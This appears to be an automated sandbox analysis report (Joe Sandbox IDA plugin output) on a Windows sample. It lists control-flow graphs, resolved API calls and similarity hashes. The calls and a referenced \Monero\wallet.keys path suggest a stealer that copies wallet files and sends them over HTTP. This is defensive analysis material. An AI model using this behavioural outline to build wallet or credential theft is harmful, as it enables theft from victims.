call 19a4a0 * 2 lstrlen call 19a4a0 lstrlen call 19a4a0 HttpSendRequestA call 198430 1191->1193 1192->1125 1350 185886-1858b0 InternetReadFile 1193->1350 1351 1858bb-185901 InternetCloseHandle 1350->1351 1352 1858b2-1858b9 1350->1352 1351->1192 1352->1351 1353 1858bd-1858fb call 19a380 call 19a270 call 19a1d0 1352->1353 1353->1350
                                    APIs
                                      • Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6
                                      • Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 0018483B
                                      • Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00184852
                                      • Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00184869
                                      • Part of subcall function 00184800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00184889
                                      • Part of subcall function 00184800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00184899
                                    • lstrlen.KERNEL32(00000000), ref: 001851E3
                                      • Part of subcall function 00198940: CryptBinaryToStringA.CRYPT32(00000000,001851D4,40000001,00000000,00000000), ref: 00198960
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00185257
                                    • StrCmpCA.SHLWAPI(?,013AE450), ref: 00185275
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00185390
                                    • HttpOpenRequestA.WININET(00000000,013AE470,?,013ADA48,00000000,00000000,00400100,00000000), ref: 001853F4
                                      • Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
                                      • Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
                                      • Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                      • Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
                                      • Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352
                                    • lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,013AE480,00000000,?,013A9AB8,00000000,?,001A1980,00000000,?,00194CAF), ref: 00185787
                                    • lstrlen.KERNEL32(00000000), ref: 0018579B
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 001857AC
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001857B3
                                    • lstrlen.KERNEL32(00000000), ref: 001857C8
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 001857F9
                                    • lstrlen.KERNEL32(00000000), ref: 00185818
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00185831
                                    • lstrlen.KERNEL32(00000000,?,?), ref: 0018585E
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00185872
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0018589D
                                    • InternetCloseHandle.WININET(00000000), ref: 00185901
                                    • InternetCloseHandle.WININET(00000000), ref: 0018590E
                                    • InternetCloseHandle.WININET(00000000), ref: 00185918
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
                                    • String ID: ------$"$"$"$--$------$------$------
                                    • API String ID: 1224485577-2774362122
                                    • Opcode ID: 8269eef8187d45414e9ddb9d72f1a4688af1db6951fb3b5f1deb7466a74eacdc
                                    • Instruction ID: e58877f8082fc0306e67f187454798edb0f6da267ef0efdf925a42af9a211a95
                                    • Opcode Fuzzy Hash: 8269eef8187d45414e9ddb9d72f1a4688af1db6951fb3b5f1deb7466a74eacdc
                                    • Instruction Fuzzy Hash: 8632AD71920118AADF15EBA4DC95FEEB378BF65700F804169B50662092EF706B4CCFA6

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1361 1859b0-185a6b call 19a170 call 184800 call 19a110 * 5 InternetOpenA StrCmpCA 1376 185a6d 1361->1376 1377 185a74-185a78 1361->1377 1376->1377 1378 185a7e-185bf6 call 198600 call 19a2f0 call 19a270 call 19a1d0 * 2 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a2f0 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a2f0 call 19a270 call 19a1d0 * 2 InternetConnectA 1377->1378 1379 186013-18603b InternetCloseHandle call 19a4a0 call 189b10 1377->1379 1378->1379 1463 185bfc-185c0a 1378->1463 1389 18607a-1860e5 call 198430 * 2 call 19a170 call 19a1d0 * 5 call 181550 call 19a1d0 1379->1389 1390 18603d-186075 call 19a1f0 call 19a380 call 19a270 call 19a1d0 1379->1390 1390->1389 1464 185c18 1463->1464 1465 185c0c-185c16 1463->1465 1466 185c22-185c55 HttpOpenRequestA 1464->1466 1465->1466 1467 185c5b-185f7f call 19a380 call 19a270 call 19a1d0 call 19a2f0 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a2f0 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a2f0 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a2f0 call 19a270 call 19a1d0 call 19a4a0 lstrlen call 19a4a0 lstrlen GetProcessHeap RtlAllocateHeap call 19a4a0 lstrlen call 19a4a0 * 2 lstrlen call 19a4a0 * 2 lstrlen call 19a4a0 lstrlen call 19a4a0 HttpSendRequestA 1466->1467 1468 186006-18600d InternetCloseHandle 1466->1468 1579 185f85-185faf InternetReadFile 1467->1579 1468->1379 1580 185fba-186000 InternetCloseHandle 1579->1580 1581 185fb1-185fb8 1579->1581 1580->1468 1581->1580 1582 185fbc-185ffa call 19a380 call 19a270 call 19a1d0 1581->1582 1582->1579
                                    APIs
                                      • Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6
                                      • Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 0018483B
                                      • Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00184852
                                      • Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00184869
                                      • Part of subcall function 00184800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00184889
                                      • Part of subcall function 00184800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00184899
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00185A48
                                    • StrCmpCA.SHLWAPI(?,013AE450), ref: 00185A63
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00185BE3
                                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,013AE5C0,00000000,?,013A9AB8,00000000,?,001A19C0), ref: 00185EC1
                                    • lstrlen.KERNEL32(00000000), ref: 00185ED2
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00185EE3
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00185EEA
                                    • lstrlen.KERNEL32(00000000), ref: 00185EFF
                                    • lstrlen.KERNEL32(00000000), ref: 00185F28
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00185F41
                                    • lstrlen.KERNEL32(00000000,?,?), ref: 00185F6B
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00185F7F
                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00185F9C
                                    • InternetCloseHandle.WININET(00000000), ref: 00186000
                                    • InternetCloseHandle.WININET(00000000), ref: 0018600D
                                    • HttpOpenRequestA.WININET(00000000,013AE470,?,013ADA48,00000000,00000000,00400100,00000000), ref: 00185C48
                                      • Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
                                      • Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
                                      • Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                      • Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
                                      • Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352
                                    • InternetCloseHandle.WININET(00000000), ref: 00186017
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 874700897-2180234286
                                    • Opcode ID: 7a1341b114aada2296654cefcb76fd9c4c26b5d5f10e6aa0b4abb1f8f963ba5f
                                    • Instruction ID: f34cc64aa71c6e1f3e51e2efc479238d667f36e26c24d4ccf83e818d462cc518
                                    • Opcode Fuzzy Hash: 7a1341b114aada2296654cefcb76fd9c4c26b5d5f10e6aa0b4abb1f8f963ba5f
                                    • Instruction Fuzzy Hash: A012BE71920118AACF15FBA4DC95FEEB379BF65700F8041A9B506620A1EF702B4DCFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1981 18a6c0-18a6dc call 19a440 1984 18a6ed-18a701 call 19a440 1981->1984 1985 18a6de-18a6eb call 19a1f0 1981->1985 1991 18a712-18a726 call 19a440 1984->1991 1992 18a703-18a710 call 19a1f0 1984->1992 1990 18a74d-18a7b8 call 19a110 call 19a380 call 19a270 call 19a1d0 call 198600 call 19a2f0 call 19a270 call 19a1d0 * 2 1985->1990 2024 18a7bd-18a7c4 1990->2024 1991->1990 1999 18a728-18a748 call 19a1d0 * 3 call 181550 1991->1999 1992->1990 2018 18ad65-18ad68 1999->2018 2025 18a800-18a814 call 19a110 2024->2025 2026 18a7c6-18a7e2 call 19a4a0 * 2 CopyFileA 2024->2026 2032 18a81a-18a8bc call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a2f0 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 2025->2032 2033 18a8c1-18a9a4 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a2f0 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a2f0 call 19a380 call 19a270 call 19a1d0 * 2 2025->2033 2037 18a7fc 2026->2037 2038 18a7e4-18a7fe call 19a170 call 198f70 2026->2038 2090 18a9a9-18a9c1 call 19a4a0 2032->2090 2033->2090 2037->2025 2038->2024 2100 18ad16-18ad28 call 19a4a0 DeleteFileA call 19a410 2090->2100 2101 18a9c7-18a9e5 2090->2101 2112 18ad2d-18ad60 call 19a410 call 19a1d0 * 5 call 181550 2100->2112 2109 18a9eb-18a9ff GetProcessHeap RtlAllocateHeap 2101->2109 2110 18acfc-18ad0c 2101->2110 2111 18aa02-18aa12 2109->2111 2119 18ad13 2110->2119 2117 18aa18-18aaba call 19a110 * 6 call 19a440 2111->2117 2118 18ac91-18ac9e lstrlen 2111->2118 2112->2018 2161 18aabc-18aacb call 19a1f0 2117->2161 2162 18aacd-18aad6 call 19a1f0 2117->2162 2121 18aceb-18acf9 2118->2121 2122 18aca0-18acd5 lstrlen call 19a170 call 181590 call 194c70 2118->2122 2119->2100 2121->2110 2141 18acda-18ace6 call 19a1d0 2122->2141 2141->2121 2166 18aadb-18aaed call 19a440 2161->2166 2162->2166 2169 18aaef-18aafe call 19a1f0 2166->2169 2170 18ab00-18ab09 call 19a1f0 2166->2170 2174 18ab0e-18ab1e call 19a480 2169->2174 2170->2174 2177 18ab2d-18ac8c call 19a4a0 lstrcat * 2 call 19a4a0 lstrcat * 2 call 19a4a0 lstrcat * 2 call 19a4a0 lstrcat * 2 call 19a4a0 lstrcat * 2 call 19a4a0 lstrcat * 2 call 189e60 call 19a4a0 lstrcat call 19a1d0 lstrcat call 19a1d0 * 6 2174->2177 2178 18ab20-18ab28 call 19a1f0 2174->2178 2177->2111 2178->2177
                                    APIs
                                      • Part of subcall function 0019A440: StrCmpCA.SHLWAPI(013A8A40,0018A6D7,?,0018A6D7,013A8A40), ref: 0019A45F
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0018A9F2
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0018A9F9
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0018A7DA
                                      • Part of subcall function 0019A1F0: lstrlen.KERNEL32(00184F55,?,?,00184F55,001A0DC6), ref: 0019A1FB
                                      • Part of subcall function 0019A1F0: lstrcpy.KERNEL32(001A0DC6,00000000), ref: 0019A255
                                      • Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
                                      • Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
                                      • Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                    • lstrcat.KERNEL32(?,00000000), ref: 0018AB3A
                                    • lstrcat.KERNEL32(?,001A12C4), ref: 0018AB49
                                    • lstrcat.KERNEL32(?,00000000), ref: 0018AB5C
                                    • lstrcat.KERNEL32(?,001A12C8), ref: 0018AB6B
                                    • lstrcat.KERNEL32(?,00000000), ref: 0018AB7E
                                    • lstrcat.KERNEL32(?,001A12CC), ref: 0018AB8D
                                    • lstrcat.KERNEL32(?,00000000), ref: 0018ABA0
                                    • lstrcat.KERNEL32(?,001A12D0), ref: 0018ABAF
                                    • lstrcat.KERNEL32(?,00000000), ref: 0018ABC2
                                    • lstrcat.KERNEL32(?,001A12D4), ref: 0018ABD1
                                    • lstrcat.KERNEL32(?,00000000), ref: 0018ABE4
                                    • lstrcat.KERNEL32(?,001A12D8), ref: 0018ABF3
                                      • Part of subcall function 00189E60: LocalAlloc.KERNEL32(00000040,?), ref: 00189EFE
                                    • lstrcat.KERNEL32(?,00000000), ref: 0018AC3C
                                    • lstrcat.KERNEL32(?,001A12DC), ref: 0018AC56
                                    • lstrlen.KERNEL32(?), ref: 0018AC95
                                    • lstrlen.KERNEL32(?), ref: 0018ACA4
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                    • DeleteFileA.KERNEL32(00000000), ref: 0018AD1F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcat$lstrcpylstrlen$FileHeap$AllocAllocateCopyDeleteLocalProcess
                                    • String ID:
                                    • API String ID: 1656385275-0
                                    • Opcode ID: 2733c701dc178f8ff22082da6a55e93765949e4afc053482fb363817dcc1bbf9
                                    • Instruction ID: eef14460913c7e25adc9b85a498845f69e7ed08daf3ce7459bf59f88e703a4a5
                                    • Opcode Fuzzy Hash: 2733c701dc178f8ff22082da6a55e93765949e4afc053482fb363817dcc1bbf9
                                    • Instruction Fuzzy Hash: 0C02FE71910108ABCF05FBA0DD96EEE777CBF65301F904169F507A60A1DF75AA08CBA2

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                      • Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
                                      • Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
                                      • Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                      • Part of subcall function 00198600: GetSystemTime.KERNEL32(001A0E02,013A9C08,001A059E,?,?,001813F9,?,0000001A,001A0E02,00000000,?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 00198626
                                      • Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
                                      • Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0018CDC3
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0018CF07
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0018CF0E
                                    • lstrcat.KERNEL32(?,00000000), ref: 0018D048
                                    • lstrcat.KERNEL32(?,001A141C), ref: 0018D057
                                    • lstrcat.KERNEL32(?,00000000), ref: 0018D06A
                                    • lstrcat.KERNEL32(?,001A1420), ref: 0018D079
                                    • lstrcat.KERNEL32(?,00000000), ref: 0018D08C
                                    • lstrcat.KERNEL32(?,001A1424), ref: 0018D09B
                                    • lstrcat.KERNEL32(?,00000000), ref: 0018D0AE
                                    • lstrcat.KERNEL32(?,001A1428), ref: 0018D0BD
                                    • lstrcat.KERNEL32(?,00000000), ref: 0018D0D0
                                    • lstrcat.KERNEL32(?,001A142C), ref: 0018D0DF
                                    • lstrcat.KERNEL32(?,00000000), ref: 0018D0F2
                                    • lstrcat.KERNEL32(?,001A1430), ref: 0018D101
                                    • lstrcat.KERNEL32(?,00000000), ref: 0018D114
                                    • lstrcat.KERNEL32(?,001A1434), ref: 0018D123
                                      • Part of subcall function 0019A1F0: lstrlen.KERNEL32(00184F55,?,?,00184F55,001A0DC6), ref: 0019A1FB
                                      • Part of subcall function 0019A1F0: lstrcpy.KERNEL32(001A0DC6,00000000), ref: 0019A255
                                    • lstrlen.KERNEL32(?), ref: 0018D16A
                                    • lstrlen.KERNEL32(?), ref: 0018D179
                                      • Part of subcall function 0019A440: StrCmpCA.SHLWAPI(013A8A40,0018A6D7,?,0018A6D7,013A8A40), ref: 0019A45F
                                    • DeleteFileA.KERNEL32(00000000), ref: 0018D1F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                    • String ID:
                                    • API String ID: 1956182324-0
                                    • Opcode ID: d352b64662a42f796af05a10654309ad6575ebc3c70bd2e5edfc967261566458
                                    • Instruction ID: 39db426fda332060d71d4e681bb9e43ba13c3c92b45c2882db4bff186f5cdaee
                                    • Opcode Fuzzy Hash: d352b64662a42f796af05a10654309ad6575ebc3c70bd2e5edfc967261566458
                                    • Instruction Fuzzy Hash: 09E1F971910108ABCF05FBA4DD96EEE777CAF65301F904168F506A70A1EF756A08CBA2

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
